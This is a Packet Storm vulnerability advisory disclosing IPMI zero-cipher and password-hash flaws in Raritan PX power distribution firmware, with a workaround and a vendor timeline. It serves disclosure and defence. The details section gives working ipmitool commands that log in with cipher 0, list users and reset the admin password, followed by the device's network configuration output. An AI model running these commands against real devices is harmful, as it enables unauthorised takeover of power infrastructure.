exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Raritan PX IPMI Disclosure

Raritan PX IPMI Disclosure
Posted Jul 3, 2014
Authored by Joerg Kost

Raritan PX suffers from IPMI zero cipher and password hash dumping vulnerabilities.

tags | exploit, vulnerability, info disclosure
SHA-256 | da2f9de7d88b273c3a457657084b817f397146c95ea78b9b90810ecdae678013

Raritan PX IPMI Disclosure

Change Mirror Download

 
Vulnerability:

Raritan PX power distribution software contains several well known IPMI vulnerabilities, e.g.
- ipmi zero cipher
- ipmi dump hash passwords   

Details:
E.g. Model DPXR20A-16:   
Software release all before and including 01.05.08 (recent version from october 2013)
ipmitool -I lanplus -C 0 -H 17.XX.XX.XX -U admin -P ad shell ipmitool> user list
2 admin true false true OEM
ipmitool> user set password 2 foo
ipmitool -I lanplus -C 0 -H 1XX.XX.XX.XX -U admin -P ad lan print Set in Progress : Set Complete
Auth Type Support : NONE MD2 MD5 PASSWORD
Auth Type Enable : Callback :
: User : MD5
: Operator : MD5
: Admin : MD5
: OEM : MD5
IP Address Source : Unspecified IP Address : 17.XX.XX.XX
Subnet Mask : 255.255.255.224
MAC Address : 00:00:00:00:00:00
SNMP Community String : public
IP Header : TTL=0x40 Flags=0x40 Precedence=0x00 TOS=0x10
BMC ARP Control : ARP Responses Enabled, Gratuitous ARP Disabled Gratituous ARP Intrvl : 2.0 seconds
Default Gateway IP : 17.XX.XX.XX
Default Gateway MAC : 00:00:00:00:00:00 Backup Gateway IP : 0.0.0.0
Backup Gateway MAC : 00:00:00:00:00:00 RMCP+ Cipher Suites : 0,1,2,3,6,7,8,11,12 Cipher Suite Priv Max : uuuOXXuuOXXuOXX : X=Cipher Suite Unused
: c=CALLBACK
: u=USER
: o=OPERA TOR
: a=ADMIN
: O=OEM    
 
 
Workaround:
- Block IPMI Port 623
- Hang to management network only
- Don't use Raritan
 
Timeline: 
2014/02/19 - Contacted CERT, VR#HRS35Y8S  
2014/05/20 - Vendor claims its fixed but won't release new firmware to verify.
2014/07/03 - Vendor claims its fixed but still won't release new firmware to verify, neither won't send firmware to me.  
2014/07/03 - FD because lack of interest and time

Regards
Joerg

  
      


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close